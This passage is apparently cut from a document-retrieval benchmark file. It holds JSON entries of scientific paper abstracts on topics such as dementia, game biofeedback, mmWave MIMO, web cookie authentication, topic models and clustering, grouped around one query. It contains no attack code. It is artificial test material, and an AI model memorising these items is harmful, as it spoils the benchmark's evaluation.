education increased the risk of dementia. Heterogeneity and sensitivity tests confirmed the evidence. Generally, study characteristics had no effect on conclusions. Qualitative analyses also showed the protective effects of higher education on developing dementia and with clinical disease onset hastening a decline in cognition and function, and greater brain pathology.\n\n\nCONCLUSION/SIGNIFICANCE\nThis systematic review and meta-analyses covering a wide range of observational studies and diverse settings provides robust support for the CR hypothesis. The CR hypothesis suggests several avenues for dementia prevention.",
"title": ""
},
{
"docid": "87b23719131fc8ab0bd60949be1595e8",
"text": "To understand how implicit and explicit biofeedback work in games, we developed a first-person shooter (FPS) game to experiment with different biofeedback techniques. While this area has seen plenty of discussion, there is little rigorous experimentation addressing how biofeedback can enhance human-computer interaction. In our two-part study, (N=36) subjects first played eight different game stages with two implicit biofeedback conditions, with two simulation-based comparison and repetition rounds, then repeated the two biofeedback stages when given explicit information on the biofeedback. The biofeedback conditions were respiration and skin-conductance (EDA) adaptations. Adaptation targets were four balanced player avatar attributes. We collected data with psycho¬physiological measures (electromyography, respiration, and EDA), a game experience questionnaire, and game-play measures.\n According to our experiment, implicit biofeedback does not produce significant effects in player experience in an FPS game. In the explicit biofeedback conditions, players were more immersed and positively affected, and they were able to manipulate the game play with the biosignal interface. We recommend exploring the possibilities of using explicit biofeedback interaction in commercial games.",
"title": ""
},
{
"docid": "94f23b8710342512c84da0c7ab9492d8",
"text": "Transferring knowledge across a sequence of related tasks is an important challenge in reinforcement learning. Despite much encouraging empirical evidence that shows benefits of transfer, there has been very little theoretical analysis. In this paper, we study a class of lifelong reinforcementlearning problems: the agent solves a sequence of tasks modeled as finite Markov decision processes (MDPs), each of which is from a finite set of MDPs with the same state/action spaces and different transition/reward functions. Inspired by the need for cross-task exploration in lifelong learning, we formulate a novel online discovery problem and give an optimal learning algorithm to solve it. Such results allow us to develop a new lifelong reinforcement-learning algorithm, whose overall sample complexity in a sequence of tasks is much smaller than that of single-task learning, with high probability, even if the sequence of tasks is generated by an adversary. Benefits of the algorithm are demonstrated in a simulated problem.",
"title": ""
},
{
"docid": "21c4cd3a91a659fcd3800967943a2ffd",
"text": "Ground reaction force (GRF) measurement is important in the analysis of human body movements. The main drawback of the existing measurement systems is the restriction to a laboratory environment. This study proposes an ambulatory system for assessing the dynamics of ankle and foot, which integrates the measurement of the GRF with the measurement of human body movement. The GRF and the center of pressure (CoP) are measured using two 6D force/moment sensors mounted beneath the shoe. The movement of the foot and the lower leg is measured using three miniature inertial sensors, two rigidly attached to the shoe and one to the lower leg. The proposed system is validated using a force plate and an optical position measurement system as a reference. The results show good correspondence between both measurement systems, except for the ankle power. The root mean square (rms) difference of the magnitude of the GRF over 10 evaluated trials was 0.012 ± 0.001 N/N (mean ± standard deviation), being 1.1 ± 0.1 % of the maximal GRF magnitude. It should be noted that the forces, moments, and powers are normalized with respect to body weight. The CoP estimation using both methods shows good correspondence, as indicated by the rms difference of 5.1± 0.7 mm, corresponding to 1.7 ± 0.3 % of the length of the shoe. The rms difference between the magnitudes of the heel position estimates was calculated as 18 ± 6 mm, being 1.4 ± 0.5 % of the maximal magnitude. The ankle moment rms difference was 0.004 ± 0.001 Nm/N, being 2.3 ± 0.5 % of the maximal magnitude. Finally, the rms difference of the estimated power at the ankle was 0.02 ± 0.005 W/N, being 14 ± 5 % of the maximal power. This power difference is caused by an inaccurate estimation of the angular velocities using the optical reference measurement system, which is due to considering the foot as a single segment. The ambulatory system considers separate heel and forefoot segments, thus allowing an additional foot moment and power to be estimated. Based on the results of this research, it is concluded that the combination of the instrumented shoe and inertial sensing is a promising tool for the assessment of the dynamics of foot and ankle in an ambulatory setting.",
"title": ""
},
{
"docid": "59084b05271efe4b22dd490958622c1e",
"text": "Millimeter-wave (mmWave) massive multiple-input multiple-output (MIMO) seamlessly integrates two wireless technologies, mmWave communications and massive MIMO, which provides spectrums with tens of GHz of total bandwidth and supports aggressive space division multiple access using large-scale arrays. Though it is a promising solution for next-generation systems, the realization of mmWave massive MIMO faces several practical challenges. In particular, implementing massive MIMO in the digital domain requires hundreds to thousands of radio frequency chains and analog-to-digital converters matching the number of antennas. Furthermore, designing these components to operate at the mmWave frequencies is challenging and costly. These motivated the recent development of the hybrid-beamforming architecture, where MIMO signal processing is divided for separate implementation in the analog and digital domains, called the analog and digital beamforming, respectively. Analog beamforming using a phase array introduces uni-modulus constraints on the beamforming coefficients. They render the conventional MIMO techniques unsuitable and call for new designs. In this paper, we present a systematic design framework for hybrid beamforming for multi-cell multiuser massive MIMO systems over mmWave channels characterized by sparse propagation paths. The framework relies on the decomposition of analog beamforming vectors and path observation vectors into Kronecker products of factors being uni-modulus vectors. Exploiting properties of Kronecker mixed products, different factors of the analog beamformer are designed for either nulling interference paths or coherently combining data paths. Furthermore, a channel estimation scheme is designed for enabling the proposed hybrid beamforming. The scheme estimates the angles-of-arrival (AoA) of data and interference paths by analog beam scanning and data-path gains by analog beam steering. The performance of the channel estimation scheme is analyzed. In particular, the AoA spectrum resulting from beam scanning, which displays the magnitude distribution of paths over the AoA range, is derived in closed form. It is shown that the inter-cell interference level diminishes inversely with the array size, the square root of pilot sequence length, and the spatial separation between paths, suggesting different ways of tackling pilot contamination.",
"title": ""
},
{
"docid": "5c0cbf418975bf435f5b02aaf7e92f3e",
"text": "Client authenticationhasbeena continuoussourceof problemson theWeb. Althoughmany well-studiedtechniquesexist for authentication, Websitescontinueto use extremely weak authenticationschemes,especiallyin non-enterprise nvironmentssuchasstorefronts. These weaknesses oftenresultfrom carelessuseof authenticators within Web cookies. Of the twenty-seven siteswe investigated,we weakenedthe client authenticationon two systems,gainedunauthorizedaccesson eight, and extractedthesecretkey usedto mint authenticatorsfrom one. We provide a descriptionof the limitations, requirements,andsecuritymodelsspecificto Webclientauthentication. This includesthe introductionof the interrogative adversary, a surprisinglypowerful adversarythat canadapti vely querya Website. We proposea setof hintsfor designinga secureclient authenticationscheme.Usingthesehints,wepresenthe designand analysisof a simple authenticationscheme secureagainstforgeriesby the interrogati ve adversary. In conjunctionwith SSL, our schemeis secureagainst forgeriesby theactiveadversary.",
"title": ""
},
{
"docid": "250b5717e5a8bd0677f9ab71123d6390",
"text": "With the advent of robot-assisted surgery, the role of data-driven approaches to integrate statistics and machine learning is growing rapidly with prominent interests in objective surgical skill assessment. However, most existing work requires translating robot motion kinematics into intermediate features or gesture segments that are expensive to extract, lack efficiency, and require significant domain-specific knowledge. We propose an analytical deep learning framework for skill assessment in surgical training. A deep convolutional neural network is implemented to map multivariate time series data of the motion kinematics to individual skill levels. We perform experiments on the public minimally invasive surgical robotic dataset, JHU-ISI Gesture and Skill Assessment Working Set (JIGSAWS). Our proposed learning model achieved competitive accuracies of 92.5%, 95.4%, and 91.3%, in the standard training tasks: Suturing, Needle-passing, and Knot-tying, respectively. Without the need of engineered features or carefully tuned gesture segmentation, our model can successfully decode skill information from raw motion profiles via end-to-end learning. Meanwhile, the proposed model is able to reliably interpret skills within a 1–3 second window, without needing an observation of entire training trial. This study highlights the potential of deep architectures for efficient online skill assessment in modern surgical training.",
"title": ""
},
{
"docid": "f2f5495973c560f15c307680bd5d3843",
"text": "The Bayesian analysis of neural networks is difficult because a simple prior over weights implies a complex prior distribution over functions . In this paper we investigate the use of Gaussian process priors over functions, which permit the predictive Bayesian analysis for fixed values of hyperparameters to be carried out exactly using matrix operations. Two methods, using optimization and averaging (via Hybrid Monte Carlo) over hyperparameters have been tested on a number of challenging problems and have produced excellent results.",
"title": ""
},
{
"docid": "5d9b29c10d878d288a960ae793f2366e",
"text": "We propose a new bandgap reference topology for supply voltages as low as one diode drop (~0.8V). In conventional low-voltage references, supply voltage is limited by the generated reference voltage. Also, the proposed topology generates the reference voltage at the output of the feedback amplifier. This eliminates the need for an additional output buffer, otherwise required in conventional topologies. With the bandgap core biased from the reference voltage, the new topology is also suitable for a low-voltage shunt reference. We fabricated a 1V, 0.35mV/degC reference occupying 0.013mm2 in a 90nm CMOS process",
"title": ""
},
{
"docid": "2da4c992e8e2e9bfdab188bedd47a4d2",
"text": "Hybrid neural networks (hybrid-NNs) have been widely used and brought new challenges to NN processors. Thinker is an energy efficient reconfigurable hybrid-NN processor fabricated in 65-nm technology. To achieve high energy efficiency, three optimization techniques are proposed. First, each processing element (PE) supports bit-width adaptive computing to meet various bit-widths of neural layers, which raises computing throughput by 91% and improves energy efficiency by <inline-formula> <tex-math notation=\"LaTeX\">$1.93 \\times $ </tex-math></inline-formula> on average. Second, PE array supports on-demand array partitioning and reconfiguration for processing different NNs in parallel, which results in 13.7% improvement of PE utilization and improves energy efficiency by <inline-formula> <tex-math notation=\"LaTeX\">$1.11 \\times $ </tex-math></inline-formula>. Third, a fused data pattern-based multi-bank memory system is designed to exploit data reuse and guarantee parallel data access, which improves computing throughput and energy efficiency by <inline-formula> <tex-math notation=\"LaTeX\">$1.11 \\times $ </tex-math></inline-formula> and <inline-formula> <tex-math notation=\"LaTeX\">$1.17 \\times $ </tex-math></inline-formula>, respectively. Measurement results show that this processor achieves 5.09-TOPS/W energy efficiency at most.",
"title": ""
},
{
"docid": "83ac82ef100fdf648a5214a50d163fe3",
"text": "We consider the problem of multi-robot taskallocation when robots have to deal with uncertain utility estimates. Typically an allocation is performed to maximize expected utility; we consider a means for measuring the robustness of a given optimal allocation when robots have some measure of the uncertainty (e.g., a probability distribution, or moments of such distributions). We introduce a new O(n) algorithm, the Interval Hungarian algorithm, that extends the classic KuhnMunkres Hungarian algorithm to compute the maximum interval of deviation (for each entry in the assignment matrix) which will retain the same optimal assignment. This provides an efficient measurement of the tolerance of the allocation to the uncertainties, for both a specific interval and a set of interrelated intervals. We conduct experiments both in simulation and with physical robots to validate the approach and to gain insight into the effect of location uncertainty on allocations for multi-robot multi-target navigation tasks.",
"title": ""
},
{
"docid": "14bfd2773bfb055ae14bfa448ba7383b",
"text": "This paper presents a novel Differential Evolution algorithm for protein folding optimization that is applied to a three-dimensional AB off-lattice model. The proposed algorithm includes two new mechanisms. A local search is used to improve convergence speed and to reduce the runtime complexity of the energy calculation. For this purpose, a local movement is introduced within the local search. The designed evolutionary algorithm has fast convergence speed and, therefore, when it is trapped into the local optimum or a relatively good solution is located, it is hard to locate a better similar solution. The similar solution is different from the good solution in only a few components. A component reinitialization method is designed to mitigate this problem. Both the new mechanisms and the proposed algorithm were analyzed on well-known amino acid sequences that are used frequently in the literature. Experimental results show that the employed new mechanisms improve the efficiency of our algorithm and that the proposed algorithm is superior to other state-of-the-art algorithms. It obtained a hit ratio of 100% for sequences up to 18 monomers, within a budget of 10 solution evaluations. New best-known solutions were obtained for most of the sequences. The existence of the symmetric best-known solutions is also demonstrated in the paper.",
"title": ""
},
{
"docid": "5bf385c6ae80f8a8f9dd22592c2530b4",
"text": "This paper represents a reliable, compact, fast and low cost smart home automation system, based on Arduino (microcontroller) and Android app. Bluetooth chip has been used with Arduino, thus eliminating the use of personal computers (PCs). Various devices such as lights, DC Servomotors have been incorporated in the designed system to demonstrate the feasibility, reliability and quick operation of the proposed smart home system. The entire designed system has been tested and it is seen capable of running successfully and perform the desired operations, such as switching functionalities, position control of Servomotor, speed control of D.C motor and light intensity control (Via Voltage Regulation).",
"title": ""
},
{
"docid": "a2b4eb0cb55ad2fa92fe7ead0edb13ad",
"text": "Modern datasets and models are notoriously difficult to explore and analyze due to their inherent high dimensionality and massive numbers of samples. Existing visualization methods which employ dimensionality reduction to two or three dimensions are often inefficient and/or ineffective for these datasets. This paper introduces T-SNE-CUDA, a GPU-accelerated implementation of t-distributed Symmetric Neighbour Embedding (t-SNE) for visualizing datasets and models. T-SNE-CUDA significantly outperforms current implementations with 50-700x speedups on the CIFAR-10 and MNIST datasets. These speedups enable, for the first time, visualization of the neural network activations on the entire ImageNet dataset - a feat that was previously computationally intractable. We also demonstrate visualization performance in the NLP domain by visualizing the GloVe embedding vectors. From these visualizations, we can draw interesting conclusions about using the L2 metric in these embedding spaces. T-SNE-CUDA is publicly available at https://github.com/CannyLab/tsne-cuda.",
"title": ""
}
] | scidocsrr |
027f089004e622f531456b1bc73223c2 | Classification of emotional states from electrocardiogram signals: a non-linear approach based on hurst | [
{
"docid": "93d8b8afe93d10e54bf4a27ba3b58220",
"text": "Researchers interested in emotion have long struggled with the problem of how to elicit emotional responses in the laboratory. In this article, we summarise five years of work to develop a set of films that reliably elicit each of eight emotional states (amusement, anger, contentment, disgust, fear, neutral, sadness, and surprise). After evaluating over 250 films, we showed selected film clips to an ethnically diverse sample of 494 English-speaking subjects. We then chose the two best films for each of the eight target emotions based on the intensity and discreteness of subjects' responses to each film. We found that our set of 16 films successfully elicited amusement, anger, contentment. disgust, sadness, surprise, a relatively neutral state, and, to a lesser extent, fear. We compare this set of films with another set recently described by Philippot (1993), and indicate that detailed instructions for creating our set of film stimuli will be provided on request.",
"title": ""
}
] | [
{
"docid": "8fd5b3cead78b47e95119ac1a70e44db",
"text": "Two-dimensional (2-D) hand-geometry features carry limited discriminatory information and therefore yield moderate performance when utilized for personal identification. This paper investigates a new approach to achieve performance improvement by simultaneously acquiring and combining three-dimensional (3-D) and 2-D features from the human hand. The proposed approach utilizes a 3-D digitizer to simultaneously acquire intensity and range images of the presented hands of the users in a completely contact-free manner. Two new representations that effectively characterize the local finger surface features are extracted from the acquired range images and are matched using the proposed matching metrics. In addition, the characterization of 3-D palm surface using SurfaceCode is proposed for matching a pair of 3-D palms. The proposed approach is evaluated on a database of 177 users acquired in two sessions. The experimental results suggest that the proposed 3-D hand-geometry features have significant discriminatory information to reliably authenticate individuals. Our experimental results demonstrate that consolidating 3-D and 2-D hand-geometry features results in significantly improved performance that cannot be achieved with the traditional 2-D hand-geometry features alone. Furthermore, this paper also investigates the performance improvement that can be achieved by integrating five biometric features, i.e., 2-D palmprint, 3-D palmprint, finger texture, along with 3-D and 2-D hand-geometry features, that are simultaneously extracted from the user's hand presented for authentication.",
"title": ""
},
{
"docid": "72b2bb4343c81576e208c2f678dae153",
"text": "We propose a novel class of statistical divergences called Relaxed Wasserstein (RW) divergence. RW divergence generalizes Wasserstein divergence and is parametrized by a class of strictly convex and differentiable functions. We establish for RW divergence several probabilistic properties, which are critical for the success of Wasserstein divergence. In particular, we show that RW divergence is dominated by Total Variation (TV) and Wasserstein-L divergence, and that RW divergence has continuity, differentiability and duality representation. Finally, we provide a non-asymptotic moment estimate and a concentration inequality for RW divergence. Our experiments on image generation demonstrate that RW divergence is a suitable choice for GANs. The performance of RWGANs with Kullback-Leibler (KL) divergence is competitive with other state-of-the-art GANs approaches. Moreover, RWGANs possess better convergence properties than the existing WGANs with competitive inception scores. To the best of our knowledge, this new conceptual framework is the first to provide not only the flexibility in designing effective GANs scheme, but also the possibility in studying different loss functions under a unified mathematical framework.",
"title": ""
},
{
"docid": "a6ab8363f9f790815f091a53713828a9",
"text": "This report reviews the structural approach for credit risk modelling, both considering the case of a single firm and the case with default dependences between firms. In the single firm case, we review the Merton (1974) model and first passage models, examining their main characteristics and extensions. Liquidation process models extend first passage models to account for the possibility of a lengthy liquidation process which might or might not end up in default. Finally, we review structural models with state dependent cash flows (recession vs. expansion) or debt coupons (ratingbased). The estimation of structural models is addressed, covering the different ways proposed in the literature. In the second part of the text, we present some approaches to model default dependences between firms. They account for two types of default correlations: cyclical default correlation and contagion effects. We close the paper with a brief mention of factor models. The paper pretends to be a guide to the literature, providing a comprehensive list of references and, along the way, suggesting different possible extensions for its future development. JEL Codes:",
"title": ""
},
{
"docid": "c608e8eca5f584f9da999b7d39de1fea",
"text": "In this paper, we propose a novel approach to discriminate malignant melanomas and benign atypical nevi, since both types of melanocytic skin lesions have very similar characteristics. Recent studies involving the non-invasive diagnosis of melanoma indicate that the concentrations of the two main classes of melanin present in the human skin, eumelanin and pheomelanin, can potentially be used in the computation of relevant features to differentiate these lesions. So, we describe how these features can be estimated using only standard camera images. Moreover, we demonstrate that using these features in conjunction with features based on the well known ABCD rule, it is possible to achieve 100% of sensitivity and more than 99% accuracy in melanocytic skin lesion discrimination, which is a highly desirable characteristic in a prescreening system. 2013 Elsevier Ltd. All rights reserved.",
"title": ""
},
{
"docid": "9d97e4d697f10d07ace5e437ba884946",
"text": "This paper focuses on the feature gene selection for cancer classification, which employs an optimization algorithm to select a subset of the genes. We propose a binary quantum-behaved particle swarm optimization (BQPSO) for cancer feature gene selection, coupling support vector machine (SVM) for cancer classification. First, the proposed BQPSO algorithm is described, which is a discretized version of original QPSO for binary 0-1 optimization problems. Then, we present the principle and procedure for cancer feature gene selection and cancer classification based on BQPSO and SVM with leave-one-out cross validation (LOOCV). Finally, the BQPSO coupling SVM (BQPSO/SVM), binary PSO coupling SVM (BPSO/SVM), and genetic algorithm coupling SVM (GA/SVM) are tested for feature gene selection and cancer classification on five microarray data sets, namely, Leukemia, Prostate, Colon, Lung, and Lymphoma. The experimental results show that BQPSO/SVM has significant advantages in accuracy, robustness, and the number of feature genes selected compared with the other two algorithms.",
"title": ""
},
{
"docid": "51793d81dd923b59f764dcb4c8a0343f",
"text": "Augmented Reality (AR) systems which use optical tracking with fiducial marker for registration have had an important role in popularizing this technology, since only a personal computer with a conventional webcam is required. However, in most these applications, the virtual elements are shown only in the foreground a real element does not occlude a virtual one. The method presented enables AR environments based on fiducial markers to support mutual occlusion between a real element and many virtual ones, according to the elements position (depth) in the environment.",
"title": ""
},
{
"docid": "49b0ba019f6f968804608aeacec2a959",
"text": "In this paper, we introduce a novel problem of audio-visual event localization in unconstrained videos. We define an audio-visual event as an event that is both visible and audible in a video segment. We collect an Audio-Visual Event (AVE) dataset to systemically investigate three temporal localization tasks: supervised and weakly-supervised audio-visual event localization, and cross-modality localization. We develop an audio-guided visual attention mechanism to explore audio-visual correlations, propose a dual multimodal residual network (DMRN) to fuse information over the two modalities, and introduce an audio-visual distance learning network to handle the cross-modality localization. Our experiments support the following findings: joint modeling of auditory and visual modalities outperforms independent modeling, the learned attention can capture semantics of sounding objects, temporal alignment is important for audio-visual fusion, the proposed DMRN is effective in fusing audio-visual features, and strong correlations between the two modalities enable cross-modality localization.",
"title": ""
},
{
"docid": "1febb341f4fa0227683f3edbe8b95ff3",
"text": "Distributed representation learned with neural networks has recently shown to be effective in modeling natural languages at fine granularities such as words, phrases, and even sentences. Whether and how such an approach can be extended to help model larger spans of text, e.g., documents, is intriguing, and further investigation would still be desirable. This paper aims to enhance neural network models for such a purpose. A typical problem of document-level modeling is automatic summarization, which aims to model documents in order to generate summaries. In this paper, we propose neural models to train computers not just to pay attention to specific regions and content of input documents with attention models, but also distract them to traverse between different content of a document so as to better grasp the overall meaning for summarization. Without engineering any features, we train the models on two large datasets. The models achieve the state-of-the-art performance, and they significantly benefit from the distraction modeling, particularly when input documents are long.",
"title": ""
},
{
"docid": "0ef01fb9322ed10529f074ef73e9a19f",
"text": "Detecting the document focus time, defined as the time the content of a document refers to, is an important task to support temporal information retrieval systems. In this paper we propose a novel approach to focus time estimation based on a bag-of-entity representation. In particular, we are interested in understanding if and to what extent existing open data sources can be leveraged to achieve focus time estimation. We leverage state of the art Named Entity Extraction tools and exploit links to Wikipedia and DBpedia to derive temporal information relevant to entities, namely years and intervals of years. We then estimate focus time as the point in time that is more relevant to the entity set associated to a document. Our method does not rely on explicit temporal expressions in the documents, so it is therefore applicable to a general context. We tested our methodology on two datasets of historical events and evaluated it against a state of the art approach, measuring improvement in average estimation error.",
"title": ""
},
{
"docid": "ada1fa32b0d44f04f5e1715d368ad50d",
"text": "Inductive synthesis, or programming-by-examples (PBE) is gaining prominence with disruptive applications for automating repetitive tasks in end-user programming. However, designing, developing, and maintaining an effective industrial-quality inductive synthesizer is an intellectual and engineering challenge, requiring 1-2 man-years of effort. Our novel observation is that many PBE algorithms are a natural fall-out of one generic meta-algorithm and the domain-specific properties of the operators in the underlying domain-specific language (DSL). The meta-algorithm propagates example-based constraints on an expression to its subexpressions by leveraging associated witness functions, which essentially capture the inverse semantics of the underlying operator. This observation enables a novel program synthesis methodology called data-driven domain-specific deduction (D4), where domain-specific insight, provided by the DSL designer, is separated from the synthesis algorithm. Our FlashMeta framework implements this methodology, allowing synthesizer developers to generate an efficient synthesizer from the mere DSL definition (if properties of the DSL operators have been modeled). In our case studies, we found that 10+ existing industrial-quality mass-market applications based on PBE can be cast as instances of D4. Our evaluation includes reimplementation of some prior works, which in FlashMeta become more efficient, maintainable, and extensible. As a result, FlashMeta-based PBE tools are deployed in several industrial products, including Microsoft PowerShell 3.0 for Windows 10, Azure Operational Management Suite, and Microsoft Cortana digital assistant.",
"title": ""
},
{
"docid": "4b8a46065520d2b7489bf0475321c726",
"text": "With computing increasingly becoming more dispersed, relying on mobile devices, distributed computing, cloud computing, etc. there is an increasing threat from adversaries obtaining physical access to some of the computer systems through theft or security breaches. With such an untrusted computing node, a key challenge is how to provide secure computing environment where we provide privacy and integrity for data and code of the application. We propose SecureME, a hardware-software mechanism that provides such a secure computing environment. SecureME protects an application from hardware attacks by using a secure processor substrate, and also from the Operating System (OS) through memory cloaking, permission paging, and system call protection. Memory cloaking hides data from the OS but allows the OS to perform regular virtual memory management functions, such as page initialization, copying, and swapping. Permission paging extends the OS paging mechanism to provide a secure way for two applications to establish shared pages for inter-process communication. Finally, system call protection applies spatio-temporal protection for arguments that are passed between the application and the OS. Based on our performance evaluation using microbenchmarks, single-program workloads, and multiprogrammed workloads, we found that SecureME only adds a small execution time overhead compared to a fully unprotected system. Roughly half of the overheads are contributed by the secure processor substrate. SecureME also incurs a negligible additional storage overhead over the secure processor substrate.",
"title": ""
},
{
"docid": "882248356efb7b81fde7e569e261a88d",
"text": "Band clamps with a flat bottomed V-section are used to connect a pair of circular flanges to provide a joint with significant axial strength. Despite the wide application of V-band clamps, their behaviour is not fully understood and the ultimate axial strength is currently only available from physical testing. This physical testing has indicated that the ultimate strength is determined by two different types of structural deformation, an elastic deformation mode and a plastic deformation mode. Initial finite element analysis work has demonstrated that analysis of this class of problem is not straightforward. This paper discusses the difficulties encountered when simulating this type of component interaction where contact is highly localised and contact pressures are high and therefore presents a finite element model to predict the ultimate axial load capacity of V-band clamps.",
"title": ""
},
{
"docid": "afdb022bd163c1d5af226dc9624c1aee",
"text": "Sapienza University of Rome, Italy 1.",
"title": ""
},
{
"docid": "e887653429edaefd4ef08c9b15feb872",
"text": "The level of presence, or immersion, a person feels with media influences the effect media has on them. This project examines both the causes and consequences of presence in the context of violent video game play. In a between subjects design, 227 participants were randomly assigned to play either a violent or a non violent video game. Causal modeling techniques revealed two separate paths to presence. First, individual differences predicted levels of presence: men felt more presence while playing the video game, as did those who play video games more frequently. Secondly, those who perceived the game to be more violent felt more presence. Those who felt more presence, felt more resentment, were more verbally aggressive, and that led to increased physically aggressive intentions. Keywords--Presence as immersion, video games, aggressive affect, violence, aggression, and social learning theory.",
"title": ""
},
{
"docid": "914f41b9f3c0d74f888c7dd83e226468",
"text": "We present a new algorithm for inferring the home location of Twitter users at different granularities, including city, state, time zone, or geographic region, using the content of users’ tweets and their tweeting behavior. Unlike existing approaches, our algorithm uses an ensemble of statistical and heuristic classifiers to predict locations and makes use of a geographic gazetteer dictionary to identify place-name entities. We find that a hierarchical classification approach, where time zone, state, or geographic region is predicted first and city is predicted next, can improve prediction accuracy. We have also analyzed movement variations of Twitter users, built a classifier to predict whether a user was travelling in a certain period of time, and use that to further improve the location detection accuracy. Experimental evidence suggests that our algorithm works well in practice and outperforms the best existing algorithms for predicting the home location of Twitter users.",
"title": ""
},
{
"docid": "b92ab7a58d1b4218b6d6554c269aefca",
"text": "Pipelines are important infrastructures in today's society. To avoid leakages in these pipelines, efficient robotic pipe inspections are required, and to this date, various types of in-pipe robots have been developed. Some of them can select their path at a T-branch at the expense of additional actuators. However, fewer actuators are better in terms of size reduction, energy conservation, production cost, and maintenance. To reduce the number of actuators, a screw drive mechanism with only one actuator has been developed for propelling an in-pipe robot through straight pipes and elbow pipes. Based on this screw drive mechanism, in this paper, we develop a novel robot that uses only two motors and can select pathways. The robot has three locomotion modes: screw driving, steering, and rolling modes. These modes enable the robot to navigate not only through straight pipes but also elbow pipes and T-branches. We performed experiments to verify the validity of the proposed mechanism.",
"title": ""
},
{
"docid": "c751115c128fd0776baf212ae19624ff",
"text": "This paper presents a natural language interface to relational database. It introduces some classical NLDBI products and their applications and proposes the architecture of a new NLDBI system including its probabilistic context free grammar, the inside and outside probabilities which can be used to construct the parse tree, an algorithm to calculate the probabilities, and the usage of dependency structures and verb subcategorization in analyzing the parse tree. Some experiment results are given to conclude the paper.",
"title": ""
},
{
"docid": "65ce54d9733d8978c68eb4fe35ce430d",
"text": "Digital photographs are replacing tradition films in our daily life and the quantity is exploding. This stimulates the strong need for efficient management tools, in which the annotation of “who” in each photo is essential. In this paper, we propose an automated method to annotate family photos using evidence from face, body and context information. Face recognition is the first consideration. However, its performance is limited by the uncontrolled condition of family photos. In family album, the same groups of people tend to appear in similar events, in which they tend to wear the same clothes within a short time duration and in nearby places. We could make use of social context information and body information to estimate the probability of the persons’ presence and identify other examples of the same recognized persons. In our approach, we first use social context information to cluster photos into events. Within each event, the body information is clustered, and then combined with face recognition results using a graphical model. Finally, the clusters with high face recognition confidence and context probabilities are identified as belonging to specific person. Experiments on a photo album containing over 1500 photos demonstrate that our approach is effective.",
"title": ""
},
{
"docid": "8ab92b0433199ab915b5cf4309660395",
"text": "Within the large body of research in complex network analysis, an important topic is the temporal evolution of networks. Existing approaches aim at analyzing the evolution on the global and the local scale, extracting properties of either the entire network or local patterns. In this paper, we focus instead on detecting clusters of temporal snapshots of a network, to be interpreted as eras of evolution. To this aim, we introduce a novel hierarchical clustering methodology, based on a dissimilarity measure (derived from the Jaccard coefficient) between two temporal snapshots of the network. We devise a framework to discover and browse the eras, either in top-down or a bottom-up fashion, supporting the exploration of the evolution at any level of temporal resolution. We show how our approach applies to real networks, by detecting eras in an evolving co-authorship graph extracted from a bibliographic dataset; we illustrate how the discovered temporal clustering highlights the crucial moments when the network had profound changes in its structure. Our approach is finally boosted by introducing a meaningful labeling of the obtained clusters, such as the characterizing topics of each discovered era, thus adding a semantic dimension to our analysis.",
"title": ""
},
{
"docid": "96a0e29eb5a55f71bce6d51ce0fedc7d",
"text": "This article describes a new method for assessing the effect of a given film on viewers’ brain activity. Brain activity was measured using functional magnetic resonance imaging (fMRI) during free viewing of films, and inter-subject correlation analysis (ISC) was used to assess similarities in the spatiotemporal responses across viewers’ brains during movie watching. Our results demonstrate that some films can exert considerable control over brain activity and eye movements. However, this was not the case for all types of motion picture sequences, and the level of control over viewers’ brain activity differed as a function of movie content, editing, and directing style. We propose that ISC may be useful to film studies by providing a quantitative neuroscientific assessment of the impact of different styles of filmmaking on viewers’ brains, and a valuable method for the film industry to better assess its products. Finally, we suggest that this method brings together two separate and largely unrelated disciplines, cognitive neuroscience and film studies, and may open the way for a new interdisciplinary field of “neurocinematic” studies.",
"title": ""
}
] | scidocsrr |
52577cff171aeb15c77eff1574d7a574 | Topic Models For Feature Selection in Document Clustering | [
{
"docid": "5d6c2580602945084d5a643c335c40f2",
"text": "Probabilistic topic models are a suite of algorithms whose aim is to discover the hidden thematic structure in large archives of documents. In this article, we review the main ideas of this field, survey the current state-of-the-art, and describe some promising future directions. We first describe latent Dirichlet allocation (LDA) [8], which is the simplest kind of topic model. We discuss its connections to probabilistic modeling, and describe two kinds of algorithms for topic discovery. We then survey the growing body of research that extends and applies topic models in interesting ways. These extensions have been developed by relaxing some of the statistical assumptions of LDA, incorporating meta-data into the analysis of the documents, and using similar kinds of models on a diversity of data types such as social networks, images and genetics. Finally, we give our thoughts as to some of the important unexplored directions for topic modeling. These include rigorous methods for checking models built for data exploration, new approaches to visualizing text and other high dimensional data, and moving beyond traditional information engineering applications towards using topic models for more scientific ends.",
"title": ""
},
{
"docid": "77efc89b550a9982f1fb73668e1221c3",
"text": "Supervised topic models utilize document's side information for discovering predictive low dimensional representations of documents; and existing models apply likelihood-based estimation. In this paper, we present a max-margin supervised topic model for both continuous and categorical response variables. Our approach, the maximum entropy discrimination latent Dirichlet allocation (MedLDA), utilizes the max-margin principle to train supervised topic models and estimate predictive topic representations that are arguably more suitable for prediction. We develop efficient variational methods for posterior inference and demonstrate qualitatively and quantitatively the advantages of MedLDA over likelihood-based topic models on movie review and 20 Newsgroups data sets.",
"title": ""
},
{
"docid": "335847313ee670dc0648392c91d8567a",
"text": "Several large scale data mining applications, such as text c ategorization and gene expression analysis, involve high-dimensional data that is also inherentl y directional in nature. Often such data is L2 normalized so that it lies on the surface of a unit hyperspher e. Popular models such as (mixtures of) multi-variate Gaussians are inadequate for characteri zing such data. This paper proposes a generative mixture-model approach to clustering directional data based on the von Mises-Fisher (vMF) distribution, which arises naturally for data distributed on the unit hypersphere. In particular, we derive and analyze two variants of the Expectation Maximiza tion (EM) framework for estimating the mean and concentration parameters of this mixture. Nume rical estimation of the concentration parameters is non-trivial in high dimensions since it i nvolves functional inversion of ratios of Bessel functions. We also formulate two clustering algorit hms corresponding to the variants of EM that we derive. Our approach provides a theoretical basis fo r the use of cosine similarity that has been widely employed by the information retrieval communit y, and obtains the spherical kmeans algorithm (kmeans with cosine similarity) as a special case of both variants. Empirical results on clustering of high-dimensional text and gene-expression d ata based on a mixture of vMF distributions show that the ability to estimate the concentration pa rameter for each vMF component, which is not present in existing approaches, yields superior resu lts, especially for difficult clustering tasks in high-dimensional spaces.",
"title": ""
}
] | [
{
"docid": "e100a602848dcba4a2e9575148486f9c",
